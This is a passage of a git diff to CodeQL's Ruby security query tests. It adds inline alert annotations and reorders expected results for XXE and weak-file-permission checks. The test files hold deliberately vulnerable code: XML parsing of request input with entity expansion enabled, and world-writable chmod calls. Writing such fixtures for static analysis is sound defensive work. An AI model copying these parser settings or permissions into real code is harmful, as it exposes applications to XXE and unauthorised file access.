LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | +| LibXmlBackend.rb:21:34:21:40 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:21:34:21:40 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | edges | LibXmlBackend.rb:16:5:16:11 | content | LibXmlBackend.rb:18:30:18:36 | content | provenance | | | LibXmlBackend.rb:16:5:16:11 | content | LibXmlBackend.rb:19:19:19:25 | content | provenance | | @@ -14,8 +19,3 @@ nodes | LibXmlBackend.rb:20:27:20:33 | content | semmle.label | content | | LibXmlBackend.rb:21:34:21:40 | content | semmle.label | content | subpaths -#select -| LibXmlBackend.rb:18:30:18:36 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:18:30:18:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | -| LibXmlBackend.rb:19:19:19:25 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:19:19:19:25 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | -| LibXmlBackend.rb:20:27:20:33 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:20:27:20:33 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | -| LibXmlBackend.rb:21:34:21:40 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:21:34:21:40 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.qlref b/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.qlref index 8ed653a4869f..50d9b176008c 100644 --- a/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.qlref +++ b/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.qlref @@ -1 +1,2 @@ -queries/security/cwe-611/Xxe.ql +query: queries/security/cwe-611/Xxe.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-611/xxe/LibXmlRuby.rb b/ruby/ql/test/query-tests/security/cwe-611/xxe/LibXmlRuby.rb index a8d640d62c6a..2e38a92330fa 100644 --- a/ruby/ql/test/query-tests/security/cwe-611/xxe/LibXmlRuby.rb +++ b/ruby/ql/test/query-tests/security/cwe-611/xxe/LibXmlRuby.rb @@ -1,15 +1,15 @@ class LibXmlRubyXXE < ApplicationController - content = params[:xml] - LibXML::XML::Document.string(content, { options: 2 | 2048, encoding: 'utf-8' }) - LibXML::XML::Document.file(content, { options: LibXML::XML::Parser::Options::NOENT | 2048}) - LibXML::XML::Document.io(content, { options: XML::Parser::Options::NOENT | 2048 }) - LibXML::XML::Parser.string(content, { options: 2 | 2048 }) - LibXML::XML::Parser.file(content, { options: 3 | 2048 }) - LibXML::XML::Parser.io(content, { options: 2 | 2048}) + content = params[:xml] # $ Source + LibXML::XML::Document.string(content, { options: 2 | 2048, encoding: 'utf-8' }) # $ Alert + LibXML::XML::Document.file(content, { options: LibXML::XML::Parser::Options::NOENT | 2048}) # $ Alert + LibXML::XML::Document.io(content, { options: XML::Parser::Options::NOENT | 2048 }) # $ Alert + LibXML::XML::Parser.string(content, { options: 2 | 2048 }) # $ Alert + LibXML::XML::Parser.file(content, { options: 3 | 2048 }) # $ Alert + LibXML::XML::Parser.io(content, { options: 2 | 2048}) # $ Alert - XML::Document.string(content, { options: 2 | 2048 }) - XML::Parser.string(content, { options: 2 | 2048 }) + XML::Document.string(content, { options: 2 | 2048 }) # $ Alert + XML::Parser.string(content, { options: 2 | 2048 }) # $ Alert LibXML::XML::Parser.file(content, { options: 2048 }) # OK diff --git a/ruby/ql/test/query-tests/security/cwe-611/xxe/Nokogiri.rb b/ruby/ql/test/query-tests/security/cwe-611/xxe/Nokogiri.rb index 76f37cfb751e..c4b03ad2645a 100644 --- a/ruby/ql/test/query-tests/security/cwe-611/xxe/Nokogiri.rb +++ b/ruby/ql/test/query-tests/security/cwe-611/xxe/Nokogiri.rb @@ -1,30 +1,30 @@ class NokogiriXXE < ApplicationController - content = params[:xml] + content = params[:xml] # $ Source - Nokogiri::XML::parse(content, nil, nil, 2) - Nokogiri::XML::parse(content, nil, nil, 1 | 2) - Nokogiri::XML::parse(content, nil, nil, 1 & ~Nokogiri::XML::ParseOptions::NONET) - Nokogiri::XML::parse(content, nil, nil, Nokogiri::XML::ParseOptions::NOENT) - Nokogiri::XML::parse(content, nil, nil, Nokogiri::XML::ParseOptions::DTDLOAD) + Nokogiri::XML::parse(content, nil, nil, 2) # $ Alert + Nokogiri::XML::parse(content, nil, nil, 1 | 2) # $ Alert + Nokogiri::XML::parse(content, nil, nil, 1 & ~Nokogiri::XML::ParseOptions::NONET) # $ Alert + Nokogiri::XML::parse(content, nil, nil, Nokogiri::XML::ParseOptions::NOENT) # $ Alert + Nokogiri::XML::parse(content, nil, nil, Nokogiri::XML::ParseOptions::DTDLOAD) # $ Alert Nokogiri::XML::parse(content, nil, nil, ~Nokogiri::XML::ParseOptions::NOENT) #OK - Nokogiri::XML::parse(content, nil, nil, ~Nokogiri::XML::ParseOptions::NONET) - Nokogiri::XML::parse(content, nil, nil, Nokogiri::XML::ParseOptions.new 2) + Nokogiri::XML::parse(content, nil, nil, ~Nokogiri::XML::ParseOptions::NONET) # $ Alert + Nokogiri::XML::parse(content, nil, nil, Nokogiri::XML::ParseOptions.new 2) # $ Alert options = Nokogiri::XML::ParseOptions.new 2048 options.noent - Nokogiri::XML::parse(content, nil, nil, options) - Nokogiri::XML::parse(content, nil, nil, (Nokogiri::XML::ParseOptions.new 0).noent) + Nokogiri::XML::parse(content, nil, nil, options) # $ Alert + Nokogiri::XML::parse(content, nil, nil, (Nokogiri::XML::ParseOptions.new 0).noent) # $ Alert - Nokogiri::XML::parse(content) { |x| x.noent } - Nokogiri::XML::parse(content) { |x| x.nononet } #FAIL + Nokogiri::XML::parse(content) { |x| x.noent } # $ Alert + Nokogiri::XML::parse(content) { |x| x.nononet } #FAIL # $ Alert Nokogiri::XML::parse(content) { |x| x.nodtdload } # OK - Nokogiri::XML::parse(content) { |x| x.nonet.noent.nodtdload } + Nokogiri::XML::parse(content) { |x| x.nonet.noent.nodtdload } # $ Alert Nokogiri::XML::parse(content, nil, nil, 2048) # OK - Nokogiri::XML::parse(content, nil, nil, 3) + Nokogiri::XML::parse(content, nil, nil, 3) # $ Alert Nokogiri::XML::parse(content) { |x| x.nonet.nodtdload } # OK - Nokogiri::XML::parse(content, nil, nil, Nokogiri::XML::ParseOptions::NOENT & ~Nokogiri::XML::ParseOptions::NOBLANKS) - Nokogiri::XML::parse(content, nil, nil, ~Nokogiri::XML::ParseOptions::NONET | Nokogiri::XML::ParseOptions::NOBLANKS) + Nokogiri::XML::parse(content, nil, nil, Nokogiri::XML::ParseOptions::NOENT & ~Nokogiri::XML::ParseOptions::NOBLANKS) # $ Alert + Nokogiri::XML::parse(content, nil, nil, ~Nokogiri::XML::ParseOptions::NONET | Nokogiri::XML::ParseOptions::NOBLANKS) # $ Alert end diff --git a/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.expected b/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.expected index 44acc636b600..d6f2cdb6d2ac 100644 --- a/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.expected +++ b/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.expected @@ -1,3 +1,27 @@ +#select +| LibXmlRuby.rb:4:34:4:40 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:4:34:4:40 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:5:32:5:38 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:5:32:5:38 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:6:30:6:36 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:6:30:6:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:7:32:7:38 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:7:32:7:38 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:8:30:8:36 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:8:30:8:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:9:28:9:34 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:9:28:9:34 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:11:26:11:32 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:11:26:11:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:12:24:12:30 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:12:24:12:30 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:5:26:5:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:5:26:5:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:6:26:6:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:6:26:6:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:7:26:7:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:7:26:7:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:8:26:8:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:8:26:8:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:9:26:9:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:9:26:9:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:11:26:11:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:11:26:11:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:12:26:12:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:12:26:12:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:15:26:15:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:15:26:15:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:16:26:16:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:16:26:16:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:18:26:18:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:18:26:18:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:19:26:19:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:19:26:19:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:22:26:22:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:22:26:22:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:25:26:25:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:25:26:25:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:27:26:27:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:27:26:27:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:28:26:28:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:28:26:28:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | edges | LibXmlRuby.rb:3:5:3:11 | content | LibXmlRuby.rb:4:34:4:40 | content | provenance | | | LibXmlRuby.rb:3:5:3:11 | content | LibXmlRuby.rb:5:32:5:38 | content | provenance | | @@ -57,27 +81,3 @@ nodes | Nokogiri.rb:27:26:27:32 | content | semmle.label | content | | Nokogiri.rb:28:26:28:32 | content | semmle.label | content | subpaths -#select -| LibXmlRuby.rb:4:34:4:40 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:4:34:4:40 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:5:32:5:38 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:5:32:5:38 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:6:30:6:36 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:6:30:6:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:7:32:7:38 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:7:32:7:38 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:8:30:8:36 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:8:30:8:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:9:28:9:34 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:9:28:9:34 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:11:26:11:32 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:11:26:11:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:12:24:12:30 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:12:24:12:30 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:5:26:5:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:5:26:5:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:6:26:6:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:6:26:6:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:7:26:7:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:7:26:7:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:8:26:8:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:8:26:8:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:9:26:9:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:9:26:9:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:11:26:11:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:11:26:11:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:12:26:12:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:12:26:12:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:15:26:15:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:15:26:15:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:16:26:16:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:16:26:16:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:18:26:18:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:18:26:18:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:19:26:19:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:19:26:19:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:22:26:22:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:22:26:22:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:25:26:25:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:25:26:25:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:27:26:27:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:27:26:27:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:28:26:28:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:28:26:28:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.qlref b/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.qlref index 8ed653a4869f..50d9b176008c 100644 --- a/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.qlref +++ b/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.qlref @@ -1 +1,2 @@ -queries/security/cwe-611/Xxe.ql +query: queries/security/cwe-611/Xxe.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-732/FilePermissions.rb b/ruby/ql/test/query-tests/security/cwe-732/FilePermissions.rb index 305bdb2d1470..00530836bb07 100644 --- a/ruby/ql/test/query-tests/security/cwe-732/FilePermissions.rb +++ b/ruby/ql/test/query-tests/security/cwe-732/FilePermissions.rb @@ -2,13 +2,13 @@ def run_chmod_1(filename) # BAD: sets file as world writable - FileUtils.chmod 0222, filename + FileUtils.chmod 0222, filename # $ Alert[rb/overly-permissive-file] # BAD: sets file as world writable - FileUtils.chmod 0622, filename + FileUtils.chmod 0622, filename # $ Alert[rb/overly-permissive-file] # BAD: sets file as world readable - FileUtils.chmod 0755, filename + FileUtils.chmod 0755, filename # $ Alert[rb/overly-permissive-file] # BAD: sets file as world readable + writable - FileUtils.chmod 0777, filename + FileUtils.chmod 0777, filename # $ Alert[rb/overly-permissive-file] end module DummyModule @@ -25,7 +25,7 @@ def run_chmod_2(filename) baz.chmod 0755, filename baz = bar # BAD: sets file as world readable - baz.chmod 0755, filename + baz.chmod 0755, filename # $ Alert[rb/overly-permissive-file] end def run_chmod_3(filename) @@ -48,26 +48,26 @@ def run_chmod_4(filename) end def run_chmod_5(filename) - perm = 0777 + perm = 0777 # $ Alert[rb/overly-permissive-file] # BAD: sets world rwx - FileUtils.chmod perm, filename + FileUtils.chmod perm, filename # $ Sink[rb/overly-permissive-file] perm2 = perm # BAD: sets world rwx - FileUtils.chmod perm2, filename + FileUtils.chmod perm2, filename # $ Sink[rb/overly-permissive-file] - perm = "u=wrx,g=rwx,o=x" + perm = "u=wrx,g=rwx,o=x" # $ Alert[rb/overly-permissive-file] perm2 = perm # BAD: sets group rwx - FileUtils.chmod perm2, filename + FileUtils.chmod perm2, filename # $ Sink[rb/overly-permissive-file] # BAD: sets file as world readable - FileUtils.chmod "u=rwx,o+r", filename + FileUtils.chmod "u=rwx,o+r", filename # $ Alert[rb/overly-permissive-file] # GOOD: sets file as group/world unreadable FileUtils.chmod "u=rwx,go-r", filename # BAD: sets group/world as +rw - FileUtils.chmod "a+rw", filename + FileUtils.chmod "a+rw", filename # $ Alert[rb/overly-permissive-file] end def run_chmod_R(filename) # BAD: sets file as world readable - FileUtils.chmod_R 0755, filename + FileUtils.chmod_R 0755, filename # $ Alert[rb/overly-permissive-file] end diff --git a/ruby/ql/test/query-tests/security/cwe-732/WeakCookieConfiguration.qlref b/ruby/ql/test/query-tests/security/cwe-732/WeakCookieConfiguration.qlref index 7c8c5ca3c934..94f0b0dac3c2 100644 --- a/ruby/ql/test/query-tests/security/cwe-732/WeakCookieConfiguration.qlref +++ b/ruby/ql/test/query-tests/security/cwe-732/WeakCookieConfiguration.qlref @@ -1 +1,2 @@ -queries/security/cwe-732/WeakCookieConfiguration.ql +query: queries/security/cwe-732/WeakCookieConfiguration.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.expected b/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.expected index 802e76f63a50..f56d7886c572 100644 --- a/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.expected +++ b/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.expected @@ -1,3 +1,15 @@ +#select +| FilePermissions.rb:5:19:5:22 | 0222 | FilePermissions.rb:5:19:5:22 | 0222 | FilePermissions.rb:5:19:5:22 | 0222 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:5:3:5:32 | call to chmod | call to chmod | +| FilePermissions.rb:7:19:7:22 | 0622 | FilePermissions.rb:7:19:7:22 | 0622 | FilePermissions.rb:7:19:7:22 | 0622 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:7:3:7:32 | call to chmod | call to chmod | +| FilePermissions.rb:9:19:9:22 | 0755 | FilePermissions.rb:9:19:9:22 | 0755 | FilePermissions.rb:9:19:9:22 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:9:3:9:32 | call to chmod | call to chmod | +| FilePermissions.rb:11:19:11:22 | 0777 | FilePermissions.rb:11:19:11:22 | 0777 | FilePermissions.rb:11:19:11:22 | 0777 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:11:3:11:32 | call to chmod | call to chmod | +| FilePermissions.rb:28:13:28:16 | 0755 | FilePermissions.rb:28:13:28:16 | 0755 | FilePermissions.rb:28:13:28:16 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:28:3:28:26 | call to chmod | call to chmod | +| FilePermissions.rb:51:10:51:13 | 0777 | FilePermissions.rb:51:10:51:13 | 0777 : Integer | FilePermissions.rb:53:19:53:22 | perm | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:53:3:53:32 | call to chmod | call to chmod | +| FilePermissions.rb:51:10:51:13 | 0777 | FilePermissions.rb:51:10:51:13 | 0777 : Integer | FilePermissions.rb:56:19:56:23 | perm2 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:56:3:56:33 | call to chmod | call to chmod | +| FilePermissions.rb:58:10:58:26 | "u=wrx,g=rwx,o=x" | FilePermissions.rb:58:10:58:26 | "u=wrx,g=rwx,o=x" : String | FilePermissions.rb:61:19:61:23 | perm2 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:61:3:61:33 | call to chmod | call to chmod | +| FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:63:3:63:39 | call to chmod | call to chmod | +| FilePermissions.rb:67:19:67:24 | "a+rw" | FilePermissions.rb:67:19:67:24 | "a+rw" | FilePermissions.rb:67:19:67:24 | "a+rw" | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:67:3:67:34 | call to chmod | call to chmod | +| FilePermissions.rb:72:21:72:24 | 0755 | FilePermissions.rb:72:21:72:24 | 0755 | FilePermissions.rb:72:21:72:24 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:72:3:72:34 | call to chmod_R | call to chmod_R | edges | FilePermissions.rb:51:3:51:6 | perm : Integer | FilePermissions.rb:53:19:53:22 | perm | provenance | | | FilePermissions.rb:51:3:51:6 | perm : Integer | FilePermissions.rb:54:3:54:7 | perm2 : Integer | provenance | | @@ -25,15 +37,3 @@ nodes | FilePermissions.rb:67:19:67:24 | "a+rw" | semmle.label | "a+rw" | | FilePermissions.rb:72:21:72:24 | 0755 | semmle.label | 0755 | subpaths -#select -| FilePermissions.rb:5:19:5:22 | 0222 | FilePermissions.rb:5:19:5:22 | 0222 | FilePermissions.rb:5:19:5:22 | 0222 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:5:3:5:32 | call to chmod | call to chmod | -| FilePermissions.rb:7:19:7:22 | 0622 | FilePermissions.rb:7:19:7:22 | 0622 | FilePermissions.rb:7:19:7:22 | 0622 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:7:3:7:32 | call to chmod | call to chmod | -| FilePermissions.rb:9:19:9:22 | 0755 | FilePermissions.rb:9:19:9:22 | 0755 | FilePermissions.rb:9:19:9:22 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:9:3:9:32 | call to chmod | call to chmod | -| FilePermissions.rb:11:19:11:22 | 0777 | FilePermissions.rb:11:19:11:22 | 0777 | FilePermissions.rb:11:19:11:22 | 0777 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:11:3:11:32 | call to chmod | call to chmod | -| FilePermissions.rb:28:13:28:16 | 0755 | FilePermissions.rb:28:13:28:16 | 0755 | FilePermissions.rb:28:13:28:16 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:28:3:28:26 | call to chmod | call to chmod | -| FilePermissions.rb:51:10:51:13 | 0777 | FilePermissions.rb:51:10:51:13 | 0777 : Integer | FilePermissions.rb:53:19:53:22 | perm | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:53:3:53:32 | call to chmod | call to chmod | -| FilePermissions.rb:51:10:51:13 | 0777 | FilePermissions.rb:51:10:51:13 | 0777 : Integer | FilePermissions.rb:56:19:56:23 | perm2 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:56:3:56:33 | call to chmod | call to chmod | -| FilePermissions.rb:58:10:58:26 | "u=wrx,g=rwx,o=x" | FilePermissions.rb:58:10:58:26 | "u=wrx,g=rwx,o=x" : String | FilePermissions.rb:61:19:61:23 | perm2 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:61:3:61:33 | call to chmod | call to chmod | -| FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:63:3:63:39 | call to chmod | call to chmod | -| FilePermissions.rb:67:19:67:24 | "a+rw" | FilePermissions.rb:67:19:67:24 | "a+rw" | FilePermissions.rb:67:19:67:24 | "a+rw" | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:67:3:67:34 | call to chmod | call to chmod | -| FilePermissions.rb:72:21:72:24 | 0755 | FilePermissions.rb:72:21:72:24 | 0755 | FilePermissions.rb:72:21:72:24 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:72:3:72:34 | call to chmod_R | call to chmod_R | diff --git a/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.qlref b/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.qlref index bf19b31509d5..baceccada54c 100644 --- a/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.qlref +++ 